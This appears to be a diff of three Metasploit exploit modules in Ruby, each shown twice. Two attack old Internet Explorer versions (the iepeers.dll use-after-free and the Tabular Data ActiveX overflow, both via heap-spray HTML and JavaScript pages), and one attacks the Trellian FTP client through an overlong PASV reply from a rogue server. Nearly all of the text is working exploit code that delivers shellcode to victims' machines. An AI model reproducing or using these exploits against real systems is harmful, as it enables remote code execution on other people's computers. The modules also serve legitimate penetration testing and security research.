||||
vulnerability. The name comes from Microsoft's suggested workaround to block
|
||||
access to the iepeers.dll file.
|
||||
|
||||
According to Nico Waisman, "The bug itself is when trying to persist an object
|
||||
using the setAttribute, which end up calling VariantChangeTypeEx with both the
|
||||
source and the destination being the same variant. So if you send as a variant
|
||||
an IDISPATCH the algorithm will try to do a VariantClear of the destination before
|
||||
using it. This will end up on a call to PlainRelease which deref the reference
|
||||
and clean the object."
|
||||
|
||||
NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'unknown', # original discovery
|
||||
'Trancer <mtrancer[at]gmail.com>', # metasploit module
|
||||
'Nanika', # HIT2010 IE7 reliable PoC
|
||||
'jduck' # minor cleanups
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-0806' ],
|
||||
[ 'OSVDB', '62810' ],
|
||||
[ 'BID', '38615' ],
|
||||
[ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
|
||||
[ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ],
|
||||
[ 'URL', 'http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html' ],
|
||||
[ 'MSB', 'MS10-018' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'InitialAutoRunScript' => 'migrate -f',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00\x09\x0a\x0d'\\",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ '(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista',
|
||||
{
|
||||
'Method' => 'automatic'
|
||||
}
|
||||
],
|
||||
|
||||
[ 'IE 6 SP0-SP2 (onclick)',
|
||||
{
|
||||
'Method' => 'onclick',
|
||||
'Ret' => 0x0C0C0C0C
|
||||
}
|
||||
],
|
||||
|
||||
# "A great celebration of HIT2010" - http://www.hitcon.org/
|
||||
[ 'IE 7.0 (marquee)',
|
||||
{
|
||||
'Method' => 'marquee',
|
||||
'Ret' => 0x0C0C0C0C
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Mar 09 2010',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
|
||||
def auto_target(cli, request)
|
||||
mytarget = nil
|
||||
|
||||
agent = request.headers['User-Agent']
|
||||
#print_status("Checking user agent: #{agent}")
|
||||
if agent =~ /Windows NT 6\.0/
|
||||
mytarget = targets[2] # IE7 on Vista
|
||||
elsif agent =~ /MSIE 7\.0/
|
||||
mytarget = targets[2] # IE7 on XP and 2003
|
||||
elsif agent =~ /MSIE 6\.0/
|
||||
mytarget = targets[1] # IE6 on NT, 2000, XP and 2003
|
||||
else
|
||||
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
|
||||
end
|
||||
|
||||
mytarget
|
||||
end
|
||||
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
if target['Method'] == 'automatic'
|
||||
mytarget = auto_target(cli, request)
|
||||
if (not mytarget)
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
else
|
||||
mytarget = target
|
||||
end
|
||||
|
||||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
|
||||
|
||||
# Encode the shellcode
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))
|
||||
|
||||
# Set the return\nops
|
||||
ret = Rex::Text.to_unescape([mytarget.ret].pack('V'))
|
||||
|
||||
# Randomize the javascript variable names
|
||||
j_shellcode = rand_text_alpha(rand(100) + 1)
|
||||
j_nops = rand_text_alpha(rand(100) + 1)
|
||||
j_slackspace = rand_text_alpha(rand(100) + 1)
|
||||
j_fillblock = rand_text_alpha(rand(100) + 1)
|
||||
j_memory = rand_text_alpha(rand(100) + 1)
|
||||
j_counter = rand_text_alpha(rand(30) + 2)
|
||||
j_ret = rand_text_alpha(rand(100) + 1)
|
||||
j_array = rand_text_alpha(rand(100) + 1)
|
||||
j_function1 = rand_text_alpha(rand(100) + 1)
|
||||
j_function2 = rand_text_alpha(rand(100) + 1)
|
||||
j_object = rand_text_alpha(rand(100) + 1)
|
||||
j_id = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
# Construct the final page
|
||||
case mytarget['Method']
|
||||
|
||||
when 'onclick'
|
||||
html = %Q|<html><body>
|
||||
<button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>
|
||||
<script language='javascript'>
|
||||
function #{j_function1}(){
|
||||
var #{j_shellcode} = unescape('#{shellcode}');
|
||||
#{j_memory} = new Array();
|
||||
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
|
||||
var #{j_nops} = unescape('#{ret}');
|
||||
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
|
||||
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
|
||||
delete #{j_nops};
|
||||
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
|
||||
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
|
||||
}
|
||||
}
|
||||
function #{j_function2}(){
|
||||
#{j_function1}();
|
||||
var #{j_object} = document.createElement('body');
|
||||
#{j_object}.addBehavior('#default#userData');
|
||||
document.appendChild(#{j_object});
|
||||
try {
|
||||
for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
|
||||
#{j_object}.setAttribute('s',window);
|
||||
}
|
||||
} catch(e){ }
|
||||
window.status+='';
|
||||
}
|
||||
|
||||
document.getElementById('#{j_id}').onclick();
|
||||
</script></body></html>
|
||||
|
|
||||
|
||||
when 'marquee'
|
||||
j_attrib = rand_text_alpha(6);
|
||||
html = %Q|<html>
|
||||
<head>
|
||||
<style type="text/css">
|
||||
.#{j_object} {behavior: url(#default#userData);}
|
||||
</style>
|
||||
</head>
|
||||
<script>
|
||||
function #{j_function1}(){
|
||||
var #{j_shellcode} = unescape('#{shellcode}');
|
||||
#{j_memory} = new Array();
|
||||
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
|
||||
var #{j_nops} = unescape('#{ret}');
|
||||
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
|
||||
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
|
||||
delete #{j_nops};
|
||||
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
|
||||
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
|
||||
}
|
||||
}
|
||||
function #{j_function2}() {
|
||||
#{j_function1}();
|
||||
for (#{j_counter} = 1; #{j_counter} <10; #{j_counter} ++ ){
|
||||
#{j_id}.setAttribute("#{j_attrib}",document.location);
|
||||
}
|
||||
#{j_id}.setAttribute("#{j_attrib}",document.getElementsByName("style"));
|
||||
document.location="about:\\u0c0c\\u0c0c\\u0c0c\\u0c0cblank";
|
||||
}
|
||||
</script>
|
||||
<body onload="#{j_function2}();"></body>
|
||||
<MARQUEE id="#{j_id}" class="#{j_object}"></MARQUEE>
|
||||
</html>
|
||||
|
|
||||
|
||||
end
|
||||
|
||||
# Transmit the compressed response to the client
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||
|
||||
# Handle the payload
|
||||
handler(cli)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -1,123 +1,123 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Internet Explorer Tabular Data Control ActiveX Memory Corruption',
|
||||
'Description' => %q{
|
||||
This module exploits a memory corruption vulnerability in the Internet Explorer
|
||||
Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet
|
||||
Explorer are vulnerable.
|
||||
|
||||
By specifying a long value as the "DataURL" parameter to this control, it is possible
|
||||
to write a NUL byte outside the bounds of an array. By targeting control flow data
|
||||
on the stack, an attacker can execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Anonymous', # original discovery
|
||||
'jduck' # metasploit version
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-0805' ],
|
||||
[ 'OSVDB', '63329' ],
|
||||
[ 'BID', '39025' ],
|
||||
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-034' ],
|
||||
[ 'MSB', 'MS10-018' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'InitialAutoRunScript' => 'migrate -f',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "", #"\x00\x09\x0a\x0d'\\",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic (Heap Spray)',
|
||||
{
|
||||
'Ret' => 0x0c0c0c0c
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Mar 09 2010',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{target.name})...")
|
||||
|
||||
# Encode the shellcode
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
||||
|
||||
# Set the return\nops
|
||||
ret = Rex::Text.to_unescape([target.ret].pack('V'))
|
||||
|
||||
# ActiveX parameters
|
||||
#progid =
|
||||
clsid = "333C7BC4-460F-11D0-BC04-0080C7055A83"
|
||||
|
||||
# exploit url
|
||||
url = "http://"
|
||||
#url << rand_text_alphanumeric(258)
|
||||
url << rand_text_alphanumeric(258+0x116+2)
|
||||
|
||||
# Construct the final page
|
||||
var_unescape = rand_text_alpha(rand(100) + 1)
|
||||
var_shellcode = rand_text_alpha(rand(100) + 1)
|
||||
var_memory = rand_text_alpha(rand(100) + 1)
|
||||
var_spray = rand_text_alpha(rand(100) + 1)
|
||||
var_i = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
html = %Q|<html><body>
|
||||
<script>
|
||||
var #{var_memory} = new Array();
|
||||
var #{var_unescape} = unescape;
|
||||
var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
|
||||
var #{var_spray} = #{var_unescape}("#{ret * 2}");
|
||||
do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0x4000 );
|
||||
for (#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
|
||||
</script>
|
||||
<object classid='clsid:#{clsid}'>
|
||||
<param name='DataURL' value='#{url}'/>
|
||||
</object>
|
||||
</body></html>
|
||||
|
|
||||
|
||||
# Transmit the compressed response to the client
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||
|
||||
# Handle the payload
|
||||
handler(cli)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Internet Explorer Tabular Data Control ActiveX Memory Corruption',
|
||||
'Description' => %q{
|
||||
This module exploits a memory corruption vulnerability in the Internet Explorer
|
||||
Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet
|
||||
Explorer are vulnerable.
|
||||
|
||||
By specifying a long value as the "DataURL" parameter to this control, it is possible
|
||||
to write a NUL byte outside the bounds of an array. By targeting control flow data
|
||||
on the stack, an attacker can execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Anonymous', # original discovery
|
||||
'jduck' # metasploit version
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-0805' ],
|
||||
[ 'OSVDB', '63329' ],
|
||||
[ 'BID', '39025' ],
|
||||
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-034' ],
|
||||
[ 'MSB', 'MS10-018' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'InitialAutoRunScript' => 'migrate -f',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "", #"\x00\x09\x0a\x0d'\\",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic (Heap Spray)',
|
||||
{
|
||||
'Ret' => 0x0c0c0c0c
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Mar 09 2010',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{target.name})...")
|
||||
|
||||
# Encode the shellcode
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
||||
|
||||
# Set the return\nops
|
||||
ret = Rex::Text.to_unescape([target.ret].pack('V'))
|
||||
|
||||
# ActiveX parameters
|
||||
#progid =
|
||||
clsid = "333C7BC4-460F-11D0-BC04-0080C7055A83"
|
||||
|
||||
# exploit url
|
||||
url = "http://"
|
||||
#url << rand_text_alphanumeric(258)
|
||||
url << rand_text_alphanumeric(258+0x116+2)
|
||||
|
||||
# Construct the final page
|
||||
var_unescape = rand_text_alpha(rand(100) + 1)
|
||||
var_shellcode = rand_text_alpha(rand(100) + 1)
|
||||
var_memory = rand_text_alpha(rand(100) + 1)
|
||||
var_spray = rand_text_alpha(rand(100) + 1)
|
||||
var_i = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
html = %Q|<html><body>
|
||||
<script>
|
||||
var #{var_memory} = new Array();
|
||||
var #{var_unescape} = unescape;
|
||||
var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
|
||||
var #{var_spray} = #{var_unescape}("#{ret * 2}");
|
||||
do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0x4000 );
|
||||
for (#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
|
||||
</script>
|
||||
<object classid='clsid:#{clsid}'>
|
||||
<param name='DataURL' value='#{url}'/>
|
||||
</object>
|
||||
</body></html>
|
||||
|
|
||||
|
||||
# Transmit the compressed response to the client
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||
|
||||
# Handle the payload
|
||||
handler(cli)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -1,93 +1,93 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::TcpServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Trellian FTP Client 3.01 PASV Remote Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered
|
||||
through an excessively long PASV message.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'zombiefx', # Original exploit author
|
||||
'dookie' # MSF module author
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/12152' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'seh',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 900,
|
||||
'BadChars' => "\x00\x29\x2c\x2e",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP Universal', { 'Ret' => "\xfd\x21\x40" } ], # 0x004021fd p/p/r in ftp.exe
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'April 11 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def on_client_connect(client)
|
||||
return if ((p = regenerate_payload(client)) == nil)
|
||||
|
||||
# Let the client log in
|
||||
client.get_once
|
||||
|
||||
user = "331 Please specify the password.\r\n"
|
||||
client.put(user)
|
||||
|
||||
client.get_once
|
||||
pass = "230 Login successful.\r\n"
|
||||
client.put(pass)
|
||||
|
||||
# Handle the clients PWD command
|
||||
client.get_once
|
||||
pwd = "257 \"/\" is current directory.\r\n"
|
||||
client.put(pwd)
|
||||
client.get_once
|
||||
|
||||
sploit = "227 Entering Passive Mode ("
|
||||
sploit << rand_text_alpha_upper(2171)
|
||||
sploit << make_nops(100)
|
||||
sploit << payload.encoded
|
||||
sploit << make_nops(900 - (payload.encoded.length))
|
||||
sploit << "\xe9\x18\xfc\xff\xff" # Jump back 1000 bytes
|
||||
sploit << "\xeb\xf9\x90\x90" # Jump back 7 bytes
|
||||
sploit << [target.ret].pack("A3")
|
||||
sploit << ")\r\n"
|
||||
|
||||
client.put(sploit)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::TcpServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Trellian FTP Client 3.01 PASV Remote Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered
|
||||
through an excessively long PASV message.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'zombiefx', # Original exploit author
|
||||
'dookie' # MSF module author
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/12152' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'seh',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 900,
|
||||
'BadChars' => "\x00\x29\x2c\x2e",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP Universal', { 'Ret' => "\xfd\x21\x40" } ], # 0x004021fd p/p/r in ftp.exe
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'April 11 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def on_client_connect(client)
|
||||
return if ((p = regenerate_payload(client)) == nil)
|
||||
|
||||
# Let the client log in
|
||||
client.get_once
|
||||
|
||||
user = "331 Please specify the password.\r\n"
|
||||
client.put(user)
|
||||
|
||||
client.get_once
|
||||
pass = "230 Login successful.\r\n"
|
||||
client.put(pass)
|
||||
|
||||
# Handle the clients PWD command
|
||||
client.get_once
|
||||
pwd = "257 \"/\" is current directory.\r\n"
|
||||
client.put(pwd)
|
||||
client.get_once
|
||||
|
||||
sploit = "227 Entering Passive Mode ("
|
||||
sploit << rand_text_alpha_upper(2171)
|
||||
sploit << make_nops(100)
|
||||
sploit << payload.encoded
|
||||
sploit << make_nops(900 - (payload.encoded.length))
|
||||
sploit << "\xe9\x18\xfc\xff\xff" # Jump back 1000 bytes
|
||||
sploit << "\xeb\xf9\x90\x90" # Jump back 7 bytes
|
||||
sploit << [target.ret].pack("A3")
|
||||
sploit << ")\r\n"
|
||||
|
||||
client.put(sploit)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|